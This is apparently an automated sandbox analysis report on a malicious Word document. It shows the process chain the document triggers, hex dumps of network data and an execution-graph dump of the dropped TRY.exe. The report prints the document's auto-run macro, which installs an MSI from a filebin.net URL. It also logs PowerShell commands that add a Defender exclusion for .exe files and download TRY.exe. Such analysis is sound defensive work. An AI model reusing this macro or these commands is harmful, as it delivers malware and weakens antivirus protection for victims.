                                                                  2022-04-20 07:18:56 UTC449INData Raw: 71 ee 07 d4 fd 94 b0 7b 35 4d 5f cb 35 a1 0b ae 25 18 2b ad 32 56 6e 1d ce d3 fe 62 11 a0 50 b0 f0 c6 1b e7 0a 07 0e 1c 7c 2f 97 9b 78 fc d2 a5 c1 7f a0 64 c2 cb f7 ef df 1f 2d f4 95 13 fb 22 53 de 38 6c 45 3a 35 8e e2 96 7e ab 2e 02 56 4a 03 ad 48 07 9d 20 a8 38 a4 94 66 62 1e b4 53 4e 5c 75 89 70 26 93 25 9f af b3 c8 78 df 17 1f 8e b6 1b 2f ff fd c4 6b a7 28 d3 7b 08 21 6b 1c e9 6e 92 81 7b 3b 43 b0 dd f6 dc cd cc 73 6f 21 52 ac 37 34 d2 d3 cb 2d a1 13 97 7a 41 91 d8 3e e0 04 14 b6 e4 70 1d 1d 96 3d 83 c2 ac 00 a5 02 82 eb d0 8d 04 28 13 28 58 0e 2c cb 81 27 03 48 0a 7c 34 3d 85 e2 f0 79 2a 6d 07 8c 72 c6 18 83 ef fb 11 61 5d d3 41 e6 27 3f f9 ce 65 00 97 33 99 cc af 00 e0 c0 81 e3 1b ec 59 eb eb 80 7a 84 52 d6 af 69 7a 2f e7 42 70 2e 44 78 0a 0f a4 f4
                                                                  Data Ascii: q{5M_5%+2VnbP|/xd-"S8lE:5~.VJH 8fbSN\up&%x/k({!kn{;Cso!R74-zA>p=((X,'H|4=y*mra]A'?e3YzRiz/Bp.Dx
                                                                  2022-04-20 07:18:56 UTC465INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 5c 5c 3f 3e 3e 3d f5 8f 87 8a ff b0 b2 b2 ff 9b ae 87 ff b2 ad 8b ff e6 e2 e1 ff ec e9 e4 ff ca c9 c7 ff 97 95 99 ff 94 90 97 ff 99 91 99 ff aa b8 c9 ff bd b9 bf ff e5 c3 c2 ff f8 f1 f1 ff c2 b7 b7 ff e4 d4 d4 ff b6 9b 9b f4 a4 85 85 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 5e 5e 40 4a 41 43 f6 7f a4 97 ff 4e e3 9d ff 77 b4 7b ff a4 9f 98 ff c7 c5 c6 ff ea e8 e7 ff da da da ff b1 b2 b2 ff 9a 98 96 ff 99 9b 9c ff 87 be e1 ff ad ba c7 ff e8 c6 c5 ff fa f2 f2 ff c2 b7 b9 ff e7 d6 d6 ff b7 9c 9c f4 a1 83 83 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 5f 5f 41 51 46 4a f6 95 c2 b0 ff 5a c7 9b ff 9d 9e 9f ff b5 b2 b4 ff ce ce ce ff f0 f0 f0 ff f0 f0 f0 ff cd cd ce ff b8 b2 ae ff a7 be ce
                                                                  Data Ascii: [\\?>>=]^^@JACNw{^__AQFJZ

                                                                  Target ID:0
                                                                  Start time:09:19:12
                                                                  Start date:20/04/2022
                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                  Imagebase:0x13f890000
                                                                  File size:1423704 bytes
                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 09:19:15
Start date: 20/04/2022
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\msiexec.exe /V
Imagebase: 0xff7e0000
File size: 128512 bytes
MD5 hash: AC2E7152124CEED36846BD1B6592A00F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 4
Start time: 09:19:19
Start date: 20/04/2022
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Imagebase: 0x310000
File size: 73216 bytes
MD5 hash: 4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 5
Start time: 09:19:23
Start date: 20/04/2022
Path: C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Imagebase: 0x6b0000
File size: 27136 bytes
MD5 hash: 1542A92D5C6F7E1E80613F3466C9CE7F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 7
Start time: 09:19:24
Start date: 20/04/2022
Path: C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Imagebase: 0xde0000
File size: 53248 bytes
MD5 hash: 659CED6D7BDA047BCC6048384231DB9F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 9
Start time: 09:19:27
Start date: 20/04/2022
Path: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Imagebase: 0x13fb60000
File size: 155136 bytes
MD5 hash: 96DF7B0C491646EFC2E5F2E9F0443B8B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 10
Start time: 09:19:30
Start date: 20/04/2022
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c thai.bat
Imagebase: 0x4a1d0000
File size: 345088 bytes
MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 12
Start time: 09:19:31
Start date: 20/04/2022
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Imagebase: 0x13f770000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 13
Start time: 09:19:34
Start date: 20/04/2022
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Imagebase: 0x13f910000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 15
Start time: 09:19:38
Start date: 20/04/2022
Path: C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Imagebase: 0xee0000
File size: 27136 bytes
MD5 hash: 1542A92D5C6F7E1E80613F3466C9CE7F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 17
Start time: 09:19:46
Start date: 20/04/2022
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase: 0xffa50000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Call Graph

[Interactive call graph rendering omitted; recoverable content: AutoOpen (line 9) -> CreateObject: 1 call]

Module: ThisDocument

Declaration

Line | Content
1 | Attribute VB_Name = "ThisDocument"
2 | Attribute VB_Base = "1Normal.ThisDocument"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = True
8 | Attribute VB_Customizable = True

APIs | Meta Information
CreateObject | CreateObject("WindowsInstaller.Installer")
UILevel |
InstallProduct |

Strings | Decrypted Strings
"WindowsInstaller.Installer"
""""
"https://filebin.net/rf43v6qzghbj7h7b/TRY.msi"

Line | Instruction | Meta Information
9 | Sub AutoOpen() |
10 | On Error Resume Next | executed
11 | Dim msi as Object |
12 | Set msi = CreateObject("WindowsInstaller.Installer") | CreateObject("WindowsInstaller.Installer"); executed
13 | msi.UILevel = 2 | UILevel
15 | msi.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi", "" | InstallProduct
16 | End Sub |

Execution Graph

Execution Coverage: 27.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 43.5%
Total number of Nodes: 910
Total number of Limit Nodes: 46
[Interactive execution graph node/edge dump omitted; it listed numbered graph nodes for TRY.exe (image base 0x13fb60000) with resolved API names (e.g. GetDesktopWindow, CreateFileA, WriteFile, RegOpenKeyExA, ExitWindowsEx, OpenProcessToken, AdjustTokenPrivileges, SetUnhandledExceptionFilter) and their call edges]
2433->2435 2434->2433 2435->2432 2435->2433 2437 13fb673ec 2436->2437 2437->2437 2438 13fb67410 CharPrevA 2437->2438 2439 13fb673fe 2437->2439 2438->2439 2439->2380 2441 13fb67e77 2440->2441 2442 13fb67e35 RtlVirtualUnwind 2440->2442 2445 13fb67c44 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2441->2445 2442->2441 2447 13fb627f9 2446->2447 2457 13fb62666 2446->2457 2448 13fb62814 2447->2448 2449 13fb6280b GlobalFree 2447->2449 2448->2404 2449->2448 2451 13fb62699 GetFileVersionInfoSizeA 2452 13fb626b0 GlobalAlloc 2451->2452 2451->2457 2452->2447 2453 13fb626c9 GlobalLock 2452->2453 2453->2447 2454 13fb626de GetFileVersionInfoA 2453->2454 2455 13fb626fc VerQueryValueA 2454->2455 2454->2457 2456 13fb627bd GlobalUnlock 2455->2456 2455->2457 2456->2457 2457->2447 2457->2451 2457->2456 2458 13fb627af GlobalUnlock 2457->2458 2459 13fb62448 2457->2459 2458->2447 2460 13fb62487 CharUpperA CharNextA CharNextA 2459->2460 2461 13fb625dc GetSystemDirectoryA 2459->2461 2462 13fb624b6 2460->2462 2463 13fb625d9 2460->2463 2464 13fb625e7 2461->2464 2465 13fb625c9 GetWindowsDirectoryA 2462->2465 2469 13fb624c0 2462->2469 2463->2461 2466 13fb625fb 2464->2466 2467 13fb673cc CharPrevA 2464->2467 2465->2464 2468 13fb67c20 7 API calls 2466->2468 2467->2466 2470 13fb6260a 2468->2470 2471 13fb673cc CharPrevA 2469->2471 2470->2457 2472 13fb6251f RegOpenKeyExA 2471->2472 2472->2464 2473 13fb6254c RegQueryValueExA 2472->2473 2474 13fb625bc RegCloseKey 2473->2474 2475 13fb62579 2473->2475 2474->2464 2476 13fb62582 ExpandEnvironmentStringsA 2475->2476 2477 13fb6259a 2475->2477 2476->2477 2477->2474 2479 13fb61291 2478->2479 2480 13fb6120f GetProcAddress 2478->2480 2481 13fb67c20 7 API calls 2479->2481 2482 13fb61227 AllocateAndInitializeSid 2480->2482 2483 13fb61288 FreeLibrary 2480->2483 2484 13fb612a0 2481->2484 2482->2483 2485 13fb6126a FreeSid 2482->2485 2483->2479 2484->2418 2484->2419 2485->2483 2488 13fb64cc0 7 API calls 2487->2488 2489 
13fb65c27 LocalAlloc 2488->2489 2490 13fb65c3f 2489->2490 2491 13fb65c7c 2489->2491 2492 13fb64a70 24 API calls 2490->2492 2493 13fb64cc0 7 API calls 2491->2493 2494 13fb65c5d GetLastError 2492->2494 2495 13fb65c8e 2493->2495 2502 13fb62e5f 2494->2502 2496 13fb65cc5 lstrcmp 2495->2496 2497 13fb65c92 2495->2497 2499 13fb65ce9 2496->2499 2500 13fb65cd9 LocalFree 2496->2500 2498 13fb64a70 24 API calls 2497->2498 2501 13fb65cb0 LocalFree 2498->2501 2503 13fb64a70 24 API calls 2499->2503 2500->2502 2501->2502 2502->2276 2502->2278 2502->2316 2504 13fb65d0b LocalFree 2503->2504 2505 13fb65d1b 2504->2505 2505->2502 2507 13fb64cc0 7 API calls 2506->2507 2508 13fb65b69 2507->2508 2509 13fb65b6e 2508->2509 2510 13fb65bb2 2508->2510 2512 13fb64a70 24 API calls 2509->2512 2511 13fb64cc0 7 API calls 2510->2511 2513 13fb65bcb 2511->2513 2519 13fb65b8d 2512->2519 2514 13fb66fb0 13 API calls 2513->2514 2515 13fb65bd7 2514->2515 2516 13fb62e82 2515->2516 2517 13fb65bdb 2515->2517 2516->2316 2520 13fb66028 2516->2520 2518 13fb64a70 24 API calls 2517->2518 2518->2519 2519->2516 2521 13fb64cc0 7 API calls 2520->2521 2522 13fb6606a LocalAlloc 2521->2522 2523 13fb660c3 2522->2523 2524 13fb66084 2522->2524 2526 13fb64cc0 7 API calls 2523->2526 2525 13fb64a70 24 API calls 2524->2525 2527 13fb660a2 GetLastError 2525->2527 2528 13fb660d5 2526->2528 2541 13fb660bc 2527->2541 2529 13fb6610c lstrcmpA LocalFree 2528->2529 2530 13fb660d9 2528->2530 2532 13fb66192 2529->2532 2539 13fb66147 2529->2539 2531 13fb64a70 24 API calls 2530->2531 2535 13fb660f7 LocalFree 2531->2535 2533 13fb66433 2532->2533 2537 13fb661aa GetTempPathA 2532->2537 2536 13fb67304 28 API calls 2533->2536 2534 13fb67c20 7 API calls 2538 13fb62e8f 2534->2538 2535->2541 2536->2541 2542 13fb661c7 2537->2542 2548 13fb661fa 2537->2548 2538->2288 2538->2316 2540 13fb65e4c 57 API calls 2539->2540 2543 13fb66167 2540->2543 2541->2534 2698 13fb65e4c 2542->2698 2543->2541 2545 13fb6616f 2543->2545 2547 13fb64a70 24 API calls 2545->2547 
2549 13fb6618d 2547->2549 2548->2541 2550 13fb66400 GetWindowsDirectoryA 2548->2550 2551 13fb6624e GetDriveTypeA 2548->2551 2549->2541 2553 13fb665b0 40 API calls 2550->2553 2554 13fb66265 GetFileAttributesA 2551->2554 2566 13fb66260 2551->2566 2553->2548 2554->2566 2556 13fb65e4c 57 API calls 2556->2548 2557 13fb6629e GetDiskFreeSpaceA 2559 13fb662c6 MulDiv 2557->2559 2557->2566 2558 13fb6229c 25 API calls 2558->2566 2559->2566 2560 13fb6633f GetWindowsDirectoryA 2560->2566 2561 13fb673cc CharPrevA 2563 13fb66361 GetFileAttributesA 2561->2563 2562 13fb665b0 40 API calls 2562->2566 2564 13fb66371 CreateDirectoryA 2563->2564 2563->2566 2564->2566 2565 13fb66398 SetFileAttributesA 2565->2566 2566->2541 2566->2550 2566->2551 2566->2554 2566->2557 2566->2558 2566->2560 2566->2561 2566->2562 2566->2565 2567 13fb65e4c 57 API calls 2566->2567 2567->2566 2569 13fb66612 2568->2569 2570 13fb6664e GetDiskFreeSpaceA 2568->2570 2571 13fb64a70 24 API calls 2569->2571 2572 13fb6685d memset GetLastError GetLastError FormatMessageA 2570->2572 2573 13fb66689 MulDiv 2570->2573 2575 13fb6662f GetLastError 2571->2575 2574 13fb668ba 2572->2574 2573->2572 2576 13fb666b1 GetVolumeInformationA 2573->2576 2579 13fb64a70 24 API calls 2574->2579 2581 13fb6683b 2575->2581 2577 13fb66745 SetCurrentDirectoryA 2576->2577 2578 13fb666e3 memset GetLastError GetLastError FormatMessageA 2576->2578 2584 13fb66766 2577->2584 2578->2574 2580 13fb668d5 SetCurrentDirectoryA 2579->2580 2580->2581 2582 13fb67c20 7 API calls 2581->2582 2583 13fb62f9b 2582->2583 2583->2295 2583->2316 2585 13fb667ae 2584->2585 2588 13fb667d2 2584->2588 2586 13fb64a70 24 API calls 2585->2586 2587 13fb667cd 2586->2587 2587->2581 2588->2581 2749 13fb62324 2588->2749 2591 13fb64cc0 7 API calls 2590->2591 2592 13fb6595b FindResourceA LoadResource LockResource 2591->2592 2593 13fb6599a 2592->2593 2609 13fb65b37 2592->2609 2594 13fb659a6 GetDlgItem ShowWindow GetDlgItem ShowWindow 2593->2594 2595 13fb659dc 2593->2595 2594->2595 2766 
13fb65814 #20 2595->2766 2598 13fb659e5 2603 13fb64a70 24 API calls 2598->2603 2599 13fb659ef #20 2599->2598 2600 13fb65a51 #22 2599->2600 2601 13fb65a8f #23 2600->2601 2602 13fb65ac9 2600->2602 2601->2598 2601->2602 2605 13fb65ad5 FreeResource 2602->2605 2606 13fb65ae3 2602->2606 2604 13fb65ac7 2603->2604 2604->2602 2605->2606 2607 13fb65b0d 2606->2607 2608 13fb65aef 2606->2608 2607->2609 2611 13fb65b1f SendMessageA 2607->2611 2610 13fb64a70 24 API calls 2608->2610 2609->2312 2610->2607 2611->2609 2613 13fb63ea0 2612->2613 2635 13fb63eb7 2612->2635 2614 13fb64cc0 7 API calls 2613->2614 2614->2635 2615 13fb63ecd memset 2615->2635 2616 13fb63fd6 2617 13fb64a70 24 API calls 2616->2617 2618 13fb63ff5 2617->2618 2619 13fb6424c 2618->2619 2622 13fb67c20 7 API calls 2619->2622 2620 13fb64cc0 7 API calls 2620->2635 2623 13fb6425d 2622->2623 2623->2307 2624 13fb64077 CompareStringA 2625 13fb64332 2624->2625 2624->2635 2625->2619 2626 13fb6434c RegOpenKeyExA 2625->2626 2626->2619 2629 13fb6437b RegQueryValueExA 2626->2629 2627 13fb642f9 2631 13fb64a70 24 API calls 2627->2631 2628 13fb64243 LocalFree 2628->2619 2633 13fb6445e RegCloseKey 2629->2633 2634 13fb643ba memset GetSystemDirectoryA 2629->2634 2636 13fb64318 LocalFree 2631->2636 2633->2619 2637 13fb643e5 2634->2637 2638 13fb643fb 2634->2638 2635->2615 2635->2616 2635->2619 2635->2620 2635->2624 2635->2625 2635->2627 2635->2628 2639 13fb63f85 CompareStringA 2635->2639 2641 13fb6421d LocalFree 2635->2641 2654 13fb64110 2635->2654 2778 13fb615f8 2635->2778 2817 13fb61c38 memset memset RegCreateKeyExA 2635->2817 2844 13fb64478 CreateProcessA 2635->2844 2636->2619 2642 13fb673cc CharPrevA 2637->2642 2643 13fb61144 _vsnprintf 2638->2643 2639->2635 2641->2625 2641->2635 2642->2638 2644 13fb64424 RegSetValueExA 2643->2644 2644->2633 2645 13fb642d4 2647 13fb64a70 24 API calls 2645->2647 2646 13fb64121 GetProcAddress 2648 13fb6427e 2646->2648 2646->2654 2651 13fb642f7 2647->2651 2649 13fb64a70 24 API calls 2648->2649 2652 
13fb642a1 FreeLibrary 2649->2652 2653 13fb642aa LocalFree GetLastError 2651->2653 2652->2653 2653->2619 2654->2645 2654->2646 2655 13fb641f6 FreeLibrary 2654->2655 2656 13fb6423d FreeLibrary 2654->2656 2857 13fb6723c 2654->2857 2655->2641 2656->2628 2658 13fb64cc0 7 API calls 2657->2658 2659 13fb63d23 LocalAlloc 2658->2659 2660 13fb63d3f 2659->2660 2661 13fb63d7e 2659->2661 2662 13fb64a70 24 API calls 2660->2662 2663 13fb64cc0 7 API calls 2661->2663 2664 13fb63d5d GetLastError 2662->2664 2665 13fb63d90 2663->2665 2670 13fb62e75 2664->2670 2666 13fb63d94 2665->2666 2667 13fb63dcb lstrcmpA 2665->2667 2671 13fb64a70 24 API calls 2666->2671 2668 13fb63e27 LocalFree 2667->2668 2669 13fb63de3 2667->2669 2668->2670 2673 13fb67304 28 API calls 2669->2673 2670->2276 2670->2316 2672 13fb63db2 LocalFree 2671->2672 2672->2670 2674 13fb63e03 LocalFree 2673->2674 2674->2670 2682 13fb66ffe 2675->2682 2676 13fb61144 _vsnprintf 2677 13fb6704d FindResourceA 2676->2677 2678 13fb66fe2 LoadResource LockResource 2677->2678 2679 13fb67069 2677->2679 2678->2679 2678->2682 2680 13fb67c20 7 API calls 2679->2680 2681 13fb67090 2680->2681 2681->2298 2682->2676 2683 13fb6706b FreeResource 2682->2683 2684 13fb6702c FreeResource 2682->2684 2683->2679 2684->2682 2686 13fb64cc0 7 API calls 2685->2686 2687 13fb64687 LocalAlloc 2686->2687 2688 13fb646c3 2687->2688 2689 13fb646a3 2687->2689 2691 13fb64cc0 7 API calls 2688->2691 2690 13fb64a70 24 API calls 2689->2690 2694 13fb646c1 2690->2694 2692 13fb646d5 2691->2692 2693 13fb646ef lstrcmpA 2692->2693 2695 13fb646d9 2692->2695 2693->2695 2696 13fb64722 LocalFree 2693->2696 2694->2316 2697 13fb64a70 24 API calls 2695->2697 2696->2694 2697->2696 2699 13fb65f3f 2698->2699 2700 13fb65e7e 2698->2700 2737 13fb6648c 2699->2737 2726 13fb65d44 2700->2726 2704 13fb67c20 7 API calls 2708 13fb6600d 2704->2708 2706 13fb65edf GetSystemInfo 2718 13fb65ef3 2706->2718 2707 13fb65f2e 2711 13fb673cc CharPrevA 2707->2711 2708->2541 2720 13fb6229c GetWindowsDirectoryA 
2708->2720 2709 13fb65fa5 2714 13fb65fed 2709->2714 2715 13fb665b0 40 API calls 2709->2715 2710 13fb65f8c CreateDirectoryA 2712 13fb65fd3 GetLastError 2710->2712 2713 13fb65f9b 2710->2713 2711->2699 2712->2714 2713->2709 2714->2704 2716 13fb65fb6 2715->2716 2716->2714 2719 13fb65fc2 RemoveDirectoryA 2716->2719 2717 13fb673cc CharPrevA 2717->2707 2718->2707 2718->2717 2719->2714 2721 13fb622d4 2720->2721 2722 13fb622f2 2720->2722 2723 13fb64a70 24 API calls 2721->2723 2724 13fb67c20 7 API calls 2722->2724 2723->2722 2725 13fb6230d 2724->2725 2725->2548 2725->2556 2728 13fb65d6f 2726->2728 2727 13fb61144 _vsnprintf 2727->2728 2728->2727 2729 13fb673cc CharPrevA 2728->2729 2732 13fb65dcb GetTempFileNameA 2728->2732 2730 13fb65dac RemoveDirectoryA GetFileAttributesA 2729->2730 2730->2728 2731 13fb65e23 CreateDirectoryA 2730->2731 2731->2732 2733 13fb65dfe 2731->2733 2732->2733 2734 13fb65de5 DeleteFileA CreateDirectoryA 2732->2734 2735 13fb67c20 7 API calls 2733->2735 2734->2733 2736 13fb65e10 2735->2736 2736->2706 2736->2707 2736->2714 2738 13fb664a7 2737->2738 2738->2738 2739 13fb664b0 LocalAlloc 2738->2739 2740 13fb66519 2739->2740 2741 13fb664ca 2739->2741 2744 13fb673cc CharPrevA 2740->2744 2742 13fb64a70 24 API calls 2741->2742 2743 13fb664e8 GetLastError 2742->2743 2748 13fb65f88 2743->2748 2745 13fb66538 CreateFileA LocalFree 2744->2745 2745->2743 2746 13fb66579 CloseHandle GetFileAttributesA 2745->2746 2746->2743 2747 13fb66594 2746->2747 2747->2743 2747->2748 2748->2709 2748->2710 2750 13fb62351 2749->2750 2751 13fb6238e 2749->2751 2752 13fb61144 _vsnprintf 2750->2752 2753 13fb623d7 2751->2753 2754 13fb62393 2751->2754 2755 13fb62369 2752->2755 2757 13fb62389 2753->2757 2761 13fb61144 _vsnprintf 2753->2761 2756 13fb61144 _vsnprintf 2754->2756 2758 13fb64a70 24 API calls 2755->2758 2760 13fb623ab 2756->2760 2759 13fb67c20 7 API calls 2757->2759 2758->2757 2762 13fb62435 2759->2762 2763 13fb64a70 24 API calls 2760->2763 2764 13fb623f3 2761->2764 2762->2581 
2763->2757 2765 13fb64a70 24 API calls 2764->2765 2765->2757 2767 13fb6589b 2766->2767 2777 13fb65904 2766->2777 2768 13fb64fa0 29 API calls 2767->2768 2770 13fb658b2 2768->2770 2769 13fb67c20 7 API calls 2771 13fb6591a 2769->2771 2772 13fb658bb #21 2770->2772 2770->2777 2771->2598 2771->2599 2773 13fb658d0 2772->2773 2772->2777 2774 13fb65350 CloseHandle 2773->2774 2773->2777 2775 13fb658f2 2774->2775 2776 13fb658f7 #23 2775->2776 2775->2777 2776->2777 2777->2769 2779 13fb61647 2778->2779 2867 13fb6155c 2779->2867 2782 13fb673cc CharPrevA 2783 13fb616da 2782->2783 2784 13fb6755c 2 API calls 2783->2784 2785 13fb61785 2784->2785 2786 13fb6178e CompareStringA 2785->2786 2787 13fb6196b 2785->2787 2786->2787 2789 13fb617bb GetFileAttributesA 2786->2789 2788 13fb6755c 2 API calls 2787->2788 2790 13fb61978 2788->2790 2791 13fb61943 2789->2791 2792 13fb617cf 2789->2792 2793 13fb61981 CompareStringA 2790->2793 2794 13fb61a0f LocalAlloc 2790->2794 2797 13fb64a70 24 API calls 2791->2797 2792->2791 2795 13fb6155c 2 API calls 2792->2795 2793->2794 2804 13fb619aa 2793->2804 2794->2791 2796 13fb61a29 GetFileAttributesA 2794->2796 2798 13fb617f3 2795->2798 2802 13fb61a39 2796->2802 2816 13fb618a5 2797->2816 2800 13fb6181d LocalAlloc 2798->2800 2805 13fb6155c 2 API calls 2798->2805 2799 13fb61b09 2803 13fb67c20 7 API calls 2799->2803 2800->2791 2801 13fb61839 GetPrivateProfileIntA GetPrivateProfileStringA 2800->2801 2806 13fb618da 2801->2806 2801->2816 2814 13fb61a8c 2802->2814 2807 13fb61b21 2803->2807 2804->2804 2808 13fb619cb LocalAlloc 2804->2808 2805->2800 2810 13fb618eb GetShortPathNameA 2806->2810 2811 13fb6190a 2806->2811 2807->2635 2808->2791 2812 13fb619f6 2808->2812 2810->2811 2815 13fb61144 _vsnprintf 2811->2815 2813 13fb61144 _vsnprintf 2812->2813 2813->2816 2875 13fb62830 2814->2875 2815->2816 2816->2799 2818 13fb61cd8 2817->2818 2819 13fb61ece 2817->2819 2822 13fb61144 _vsnprintf 2818->2822 2824 13fb61d29 2818->2824 2820 13fb67c20 7 API calls 2819->2820 2821 
13fb61edd 2820->2821 2821->2635 2823 13fb61cf8 RegQueryValueExA 2822->2823 2823->2818 2823->2824 2825 13fb61d44 GetSystemDirectoryA 2824->2825 2826 13fb61d2d RegCloseKey 2824->2826 2827 13fb673cc CharPrevA 2825->2827 2826->2819 2828 13fb61d62 LoadLibraryA 2827->2828 2829 13fb61d78 GetProcAddress FreeLibrary 2828->2829 2830 13fb61e2f GetModuleFileNameA 2828->2830 2829->2830 2831 13fb61da4 GetSystemDirectoryA 2829->2831 2832 13fb61e48 RegCloseKey 2830->2832 2835 13fb61dc8 2830->2835 2833 13fb61db5 2831->2833 2831->2835 2832->2819 2834 13fb673cc CharPrevA 2833->2834 2834->2835 2835->2835 2836 13fb61df1 LocalAlloc 2835->2836 2837 13fb61e55 2836->2837 2838 13fb61e0f 2836->2838 2840 13fb61144 _vsnprintf 2837->2840 2839 13fb64a70 24 API calls 2838->2839 2841 13fb61e2d 2839->2841 2842 13fb61e8b 2840->2842 2841->2832 2842->2842 2843 13fb61e94 RegSetValueExA RegCloseKey LocalFree 2842->2843 2843->2819 2845 13fb645d3 GetLastError GetLastError FormatMessageA 2844->2845 2846 13fb644fa WaitForSingleObject GetExitCodeProcess 2844->2846 2847 13fb64a70 24 API calls 2845->2847 2850 13fb64525 2846->2850 2848 13fb6463f 2847->2848 2854 13fb67c20 7 API calls 2848->2854 2851 13fb64556 CloseHandle CloseHandle 2850->2851 2852 13fb62174 18 API calls 2850->2852 2851->2848 2853 13fb645ca 2851->2853 2855 13fb64579 2852->2855 2853->2848 2856 13fb64652 2854->2856 2855->2851 2856->2635 2858 13fb67271 2857->2858 2859 13fb673cc CharPrevA 2858->2859 2860 13fb672af GetFileAttributesA 2859->2860 2861 13fb672d6 LoadLibraryA 2860->2861 2862 13fb672bf 2860->2862 2864 13fb672e3 2861->2864 2862->2861 2863 13fb672c3 LoadLibraryExA 2862->2863 2863->2864 2865 13fb67c20 7 API calls 2864->2865 2866 13fb672f3 2865->2866 2866->2654 2868 13fb6157d 2867->2868 2870 13fb61595 2868->2870 2871 13fb615c5 2868->2871 2888 13fb674ec 2868->2888 2872 13fb674ec 2 API calls 2870->2872 2871->2782 2871->2783 2873 13fb615a3 2872->2873 2873->2871 2874 13fb674ec 2 API calls 2873->2874 2874->2873 2876 13fb629b4 2875->2876 2877 
13fb62864 GetModuleFileNameA 2875->2877 2878 13fb67c20 7 API calls 2876->2878 2877->2876 2887 13fb62886 2877->2887 2879 13fb629c7 2878->2879 2879->2799 2880 13fb6288a IsDBCSLeadByte 2880->2887 2881 13fb62992 CharNextA 2884 13fb6299e CharNextA 2881->2884 2882 13fb628a9 CharNextA CharUpperA 2883 13fb6293d CharUpperA 2882->2883 2882->2887 2883->2887 2884->2876 2884->2880 2886 13fb628de CharPrevA 2886->2887 2887->2880 2887->2881 2887->2882 2887->2884 2887->2886 2893 13fb6745c 2887->2893 2889 13fb67504 2888->2889 2890 13fb6750e IsDBCSLeadByte 2889->2890 2891 13fb6753f 2889->2891 2892 13fb6752e CharNextA 2889->2892 2890->2889 2890->2891 2891->2868 2892->2889 2894 13fb67474 2893->2894 2894->2894 2895 13fb6747d CharPrevA 2894->2895 2896 13fb67493 CharPrevA 2895->2896 2897 13fb674a4 2896->2897 2898 13fb6748b 2896->2898 2899 13fb674cb 2897->2899 2900 13fb674bf CharNextA 2897->2900 2901 13fb674ae CharPrevA 2897->2901 2898->2896 2898->2897 2899->2887 2900->2899 2901->2899 2901->2900 2903 13fb620f7 2902->2903 2904 13fb62149 2902->2904 2906 13fb673cc CharPrevA 2903->2906 2905 13fb67c20 7 API calls 2904->2905 2907 13fb6215b 2905->2907 2908 13fb6210a WritePrivateProfileStringA _lopen 2906->2908 2907->2339 2908->2904 2909 13fb62131 _llseek _lclose 2908->2909 2909->2904 3050 13fb632b0 3051 13fb63379 3050->3051 3053 13fb632c2 3050->3053 